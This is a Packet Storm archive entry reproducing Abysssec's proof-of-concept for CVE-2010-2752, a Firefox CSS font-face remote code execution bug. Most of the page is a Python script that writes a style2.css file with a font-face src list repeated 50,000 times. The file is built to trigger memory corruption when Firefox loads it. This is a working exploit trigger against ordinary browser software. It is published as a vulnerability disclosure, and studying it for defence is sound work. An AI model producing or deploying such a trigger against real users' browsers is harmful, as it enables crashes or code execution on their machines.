Lucene search

K
packetstormAbysssecPACKETSTORM:94241
HistorySep 25, 2010 - 12:00 a.m.

Month Of Abysssec Undisclosed Bugs - Mozilla Firefox CSS Font-Face

2010-09-2500:00:00
Abysssec
packetstormsecurity.com
33

0.798 High

EPSS

Percentile

98.0%

`'''  
__ __ ____ _ _ ____   
| \/ |/ __ \ /\ | | | | _ \  
| \ / | | | | / \ | | | | |_) |  
| |\/| | | | |/ /\ \| | | | _ <  
| | | | |__| / ____ \ |__| | |_) |  
|_| |_|\____/_/ \_\____/|____/  
  
http://www.exploit-db.com/moabu-15-mozilla-firefox-css-font-face-remote-code-execution-vulnerability/  
http://www.exploit-db.com/sploits/moaub-25-exploit.zip  
  
'''  
  
'''  
Title : Mozilla Firefox CSS font-face Remote Code Execution Vulnerability  
Version : Firefox  
Analysis : http://www.abysssec.com  
Vendor : http://www.mozilla.com  
Impact : Crirical  
Contact : shahin [at] abysssec.com , info [at] abysssec.com  
Twitter : @abysssec  
CVE : CVE-2010-2752  
  
'''  
  
import sys;  
  
myStyle = """  
@font-face {  
font-family: Sean;  
font-style: normal;  
font-weight: normal;  
src: url(SEAN1.eot);  
src: url('type/filename.woff') format('woff')  
  
"""  
i=0  
while(i<50000):  
myStyle = myStyle + ",url('type/filename.otf') format('opentype')\n";  
i=i+1  
  
myStyle = myStyle + ",url('type/filename.otf') format('opentype');\n";  
myStyle = myStyle + "}\n";  
cssFile = open("style2.css","w")  
cssFile.write(myStyle)  
cssFile.close()  
  
`